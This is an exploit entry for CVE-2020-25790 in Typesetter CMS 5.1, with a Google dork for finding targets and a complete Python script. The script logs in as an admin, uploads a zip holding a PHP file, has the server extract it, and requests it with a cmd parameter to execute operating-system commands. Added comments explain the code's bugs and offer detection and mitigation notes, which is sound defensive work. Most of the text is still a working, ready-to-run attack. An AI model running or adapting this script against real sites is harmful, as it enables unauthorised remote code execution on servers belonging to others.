Typesetter CMS 5.1 - Arbitrary Code Execution (Authenticated)


# Exploit Title: Typesetter CMS 5.1 - Arbitrary Code Execution
# Exploit Author: Rodolfo "t0gu" Tavares
# Contact: @t0guu (TW)
# Software Homepage: https://www.typesettercms.com/
# Version : 5.1
# Tested on: Linux / Apache
# Category: WebApp
# Google Dork: intext:"Powered by Typesetter"
# Date: 2020-09-29
# CVE : CVE-2020-25790

######## Description ########
#
# Typesetter CMS provides a web-interface upload feature available to an
# account that holds upload privileges. Through this feature it is possible
# to upload a .zip file that contains a malicious .php file. The same web
# interface can also extract that file: the attacker only needs to extract
# the previously uploaded .zip and then open the malicious .php file to
# execute commands on the operating system.
#

######## Exploit with Poc ########


https://github.com/t0gu/CVE-2020-25790

####### Code #######


# see the poc at https://github.com/t0gu/CVE-2020-25790

import argparse
from bs4 import BeautifulSoup
import requests
import sys
import  re


import urllib3
from urllib3.exceptions import InsecureRequestWarning

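# Static start-up banner. The usage text below is hand-written and used to
# omit the required -f/--file option that the parser further down declares;
# it now lists every required option. argparse's own --help output remains
# the authoritative usage description.
banner = """ 

 
 ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗  ██████╗       ██████╗ ███████╗███████╗ █████╗  ██████╗ 
██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗██╔═████╗      ╚════██╗██╔════╝╚════██║██╔══██╗██╔═████╗
██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝██║██╔██║█████╗ █████╔╝███████╗    ██╔╝╚██████║██║██╔██║
██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ████╔╝██║╚════╝██╔═══╝ ╚════██║   ██╔╝  ╚═══██║████╔╝██║
╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗╚██████╔╝      ███████╗███████║   ██║   █████╔╝╚██████╔╝
 ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝ ╚═════╝       ╚══════╝╚══════╝   ╚═╝   ╚════╝  ╚═════╝ 

by: t0gu


usage: main.py [-h] -p PASSWORD -l LOGIN -u URL -f FILE

==> Exploit for CVE 2020-25790

optional arguments:
  -h, --help            show this help message and exit
  -p PASSWORD, --password PASSWORD
                        ==> admin password
  -l LOGIN, --login LOGIN
                        ==> admin login
  -u URL, --url URL     ==> main URL
  -f FILE, --file FILE  ==> zip file with php file inside

  """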

print(banner)
# Argument parsing runs at import time: importing this module as a library
# (for example from a test) exits with a usage error unless sys.argv is set.
menu = argparse.ArgumentParser(description="==> Exploit for CVE 2020-25790")
menu.add_argument("-p", "--password", required=True, help="==> admin password")
menu.add_argument("-l", "--login", required=True, help="==> admin login")
menu.add_argument("-u", "--url", required=True, help="==> main URL")
# Path to the archive that Exploit.__init__ opens in binary mode.
menu.add_argument("-f", "--file", required=True, help="==> Malicous zip file with php file inside")
args = menu.parse_args()

# Module-level copies of the parsed options; the __main__ block at the bottom
# of the file passes these four names to Exploit().
login = args.login
password = args.password
url = args.url
file = args.file


# Local proxy settings (127.0.0.1:8080), bound under two names. No requests
# call in this file passes a `proxies=` argument, so this mapping is unused and
# all traffic is sent directly to the target.
PROXIES = proxies = {
    "http": "http://127.0.0.1:8080",
    "https": "https://127.0.0.1:8080",
}


class Exploit:
    """Drive the authenticated upload -> extract -> request chain against a Typesetter CMS admin interface.

    Every request in this class is sent with ``verify=False``, so TLS
    certificate errors are ignored; the ``InsecureRequestWarning`` imported at
    the top of the file is never suppressed, so urllib3 emits one warning per
    HTTPS request. The module-level ``PROXIES`` mapping is never used here.

    Defender notes, derived from the request sequence below:
      * ``get_cookies`` performs a complete login on every call and is reached
        from ``get_hash_folders``, ``upload_zip`` and ``get_verified``; a
        single run therefore produces several logins (each preceded by a GET
        of ``/Admin``) from one client within seconds.
      * The file-manager endpoint ``/Admin_Finder`` receives ``cmd=open``,
        ``cmd=upload`` (multipart field ``upload[]``) and ``cmd=extract`` in
        quick succession, followed by a direct GET of a file under
        ``/data/_uploaded/file/`` carrying a ``cmd`` query parameter.
      * Serving the upload directory without script execution, and not
        extracting archives server-side into a web-served path, removes the
        impact of the final step.
    """

    def __init__(self, login, password, url, file):
        """Store credentials and the target base URL and open the upload payload.

        ``file`` is opened in binary mode and kept on ``self.file``; nothing in
        this class closes it, so the handle lives until the object is collected.
        """
        self.login = login
        self.password = password
        self.url = url
        # Fixed desktop-browser User-Agent sent with every request. It ends in
        # a bare "Safari" token with no version, which a UA-based rule can key on.
        self.user_agent = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari"
        self.file = open(file, 'rb')

    def get_nounce(self):
        """Fetch ``/Admin`` and return the ``value`` of the first element found inside an <input>.

        Returns ``None`` implicitly when nothing is returned from the loop or
        when a caught exception is printed. Only ``BaseHTTPError`` and
        ``Timeout`` are caught; connection errors propagate to the caller.
        """
        try:
            url = self.url + "/Admin"
            r = requests.get(url=url, headers={'User-Agent': self.user_agent}, timeout=3, verify=False)
            data = r.text
            soap_obj = BeautifulSoup(data, 'html.parser')
            for inp in soap_obj.find_all("input"):
                # NOTE(review): iterating a Tag walks its children rather than
                # its attributes; whether `v['value']` is ever reached depends
                # on the parsed markup — verify against a real response.
                for v in inp:
                    nounce = v['value']
                    # `x != None or x != ""` is always true, so the first value
                    # reached is returned unconditionally.
                    if nounce != None or nounce != "":
                        return nounce
        except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e:
            print(f'==> Error {e}')

    def get_hash_folders(self):
        """Log in, request the file-manager tree (``cmd=open``) and return the hash of ``files[2]``.

        Both ``get_cookies`` and ``get_verified`` are called here, and each of
        them logs in again, so this method alone triggers two logins. A
        non-JSON body raises ``ValueError`` and a missing ``files[2]['hash']``
        raises ``IndexError``/``KeyError``; neither is caught below.
        """

        cookie_auth = self.get_cookies()
        hash_verified = self.get_verified()
        data_post = {'verified': hash_verified, 'cmd': 'open', 'target':'', 'init': 1, 'tree': 1}
        try:
            url = self.url + "/Admin_Finder"
            r = requests.post(url=url, data=data_post, headers={'User-Agent': self.user_agent, 'Cookie': cookie_auth}, timeout=10, verify=False)
            json_data = r.json()
            # Hard-coded index into the returned file list; the third entry is
            # assumed to be the folder used as the upload target.
            hash_dir = json_data['files'][2]['hash']
            return hash_dir
        except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e:
            print(f'==> Error {e}')

    def get_cookies(self):
        """Perform a form login to ``/Admin`` and return ``"<name>=<value>;"`` taken from ``Set-Cookie``.

        Returns ``None`` implicitly when no nonce was obtained, when the parsed
        cookie name is empty, or when a caught exception is printed. A response
        without a ``Set-Cookie`` header raises ``KeyError`` (not caught). The
        password travels in clear in the ``password`` field; the ``pass_md5``,
        ``pass_sha`` and ``pass_sha512`` fields are sent empty.
        """

        nounce = self.get_nounce()
        if nounce:
            try:
                url = self.url + "/Admin"
                data_post = {'file': '', 'cmd': 'login', 'login_nonce': nounce, 'username': self.login, 'user_sha': '',
                             'password': self.password, 'pass_md5': '', 'pass_sha': '', 'pass_sha512': '',
                             'remember': 'on', 'verified': ''}
                # A fixed "g=2" cookie accompanies the login; allow_redirects=False
                # keeps the headers of the first response rather than those of
                # any redirect target.
                r = requests.post(url=url, verify=False, timeout=3, data=data_post, allow_redirects=False,
                                  headers={'User-Agent': self.user_agent, 'Cookie': 'g=2'})
                cookie_admin = r.headers['Set-Cookie']
                # Split on ':' first, then take name and value of the leading
                # "name=value" pair, cutting the value at the first ';'.
                cookie_name = cookie_admin.split(':')[0].split('=')[0]
                cookie_value = cookie_admin.split(':')[0].split('=')[1].split(';')[0]

                if cookie_name == None or cookie_name == "":
                    # The failure is only reported when the value is empty too;
                    # an empty name with a non-empty value returns None silently.
                    if cookie_value == None or cookie_value == "":
                        print("==> Something went wrong while login")
                else:
                    data = f"{cookie_name}={cookie_value};"
                    return data
            except (requests.exceptions.Timeout, requests.exceptions.BaseHTTPError) as e:
                print(f'==> Error while login {e}')

    def upload_zip(self):
        """Upload ``self.file`` through ``/Admin_Finder`` (``cmd=upload``) and hand off to ``extract_file``.

        This is the entry point used by the ``__main__`` block. It first
        collects a ``verified`` token, a target folder hash and an auth cookie;
        each of those helpers logs in again. Unlike the other methods this one
        catches ``HTTPError`` rather than ``BaseHTTPError``. A reply without
        ``added[0]['hash']`` raises an uncaught ``KeyError``/``IndexError``.
        """
        url = self.url + '/Admin_Finder'
        hash_verified = self.get_verified()
        hash_dir = self.get_hash_folders()
        auth_cookie = self.get_cookies()

        try:
            # self.file is the open handle from __init__, so this prints the
            # file object's repr rather than just the path.
            print(f"==> Uploading file: {self.file}")
            data = {'cmd': "upload", "target": hash_dir, "verified": hash_verified}
            # Multipart upload under the field name 'upload[]'.
            r = requests.post(url=url, verify=False, timeout=10,
                              headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie}, data=data, files={'upload[]': self.file})
            hash_file = r.json()['added'][0]['hash']
            self.extract_file(auth_cookie, hash_file, hash_verified)
        except (requests.exceptions.HTTPError, requests.exceptions.Timeout) as e:
            print(f"==> Error while uploading {e}")


    def extract_file(self, auth_cookie, hash_file, hash_verified):
        """Ask the file manager to extract the uploaded archive (``cmd=extract``), then call ``xpl``.

        Args:
            auth_cookie: ``"name=value;"`` string produced by ``get_cookies``.
            hash_file: hash of the uploaded archive from the upload reply.
            hash_verified: ``verified`` token from ``get_verified``.

        ``added[0]['name']`` from the JSON reply is used as the name of the
        extracted file; a missing key raises an uncaught exception.
        """
        data_post={'verified': hash_verified, 'cmd': 'extract', 'target': hash_file}
        try:
            url = self.url + "/Admin_Finder"
            r = requests.post(url=url, data=data_post, headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie}, timeout=10, verify=False)
            name_file = r.json()['added'][0]['name']
            print(f"==> All Hashes are collected from: {name_file}") 
            self.xpl(auth_cookie,name_file)
        except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e:
            print(f'==> Error {e}')


    def xpl(self, auth_cookie, name_file):
        """Request the extracted file under ``/data/_uploaded/file/`` with ``?cmd=id`` and print any <pre> content.

        Defender notes: a GET for a path under ``/data/_uploaded/file/`` that
        carries a ``cmd`` query parameter and the admin session cookie is the
        observable final step of this chain; a web server that does not execute
        scripts from the upload directory returns the file instead of running it.
        """
        try:
            url = self.url + "/data/_uploaded/file/" + name_file + "?cmd=id"
            # Every "index.php" substring is stripped from the URL, so an
            # extracted index.php is reached through its directory path.
            new_url = url.replace("index.php", "")
            print(f"==> Try to exploit: {new_url}")
            r = requests.get(url=new_url, headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie}, timeout=10, verify=False)
            pattern = r'<pre>(.*?)</pre>'
            # Newlines are removed before matching because '.' does not cross
            # them without re.DOTALL.
            m = re.search(pattern, r.text.replace("\n", ""))
            # `m != ""` is always true for a Match object; only the None test matters.
            if m is not None and m != "":
                print(f"==> Vulnerable: {m.group(1)}")
        except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e:
            print(f'==> Error {e}')


    def get_verified(self):
        """Log in, fetch ``/Admin/Uploaded`` and return the ``verified`` token found in the page.

        The pattern ``"verified":"(.*)"}`` is greedy, so it captures up to the
        last ``"}`` on the same line. Because the guard is ``m is not None or
        m != ""``, a ``None`` match still reaches ``m.group(1)`` and raises
        ``AttributeError``, which is not caught here.
        """
        try:
            url = self.url + "/Admin/Uploaded"
            # A fresh login for this one request.
            auth_cookie = self.get_cookies()
            r = requests.get(url=url, headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie}, timeout=10, verify=False)
            data = r.text
            pattern_regex = r'"verified":"(.*)"}'
            m = re.search(pattern_regex, data)
            if m is not None or m != "":
                return m.group(1)

        except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e:
            print(f'==> Error {e}')

if __name__ == "__main__":
    # `login`, `password`, `url` and `file` are the module globals filled from
    # argparse above; upload_zip() runs the complete request chain and the
    # file handle opened in Exploit.__init__ is never closed afterwards.
    obj = Exploit(login, password, url, file)
    obj.upload_zip()
            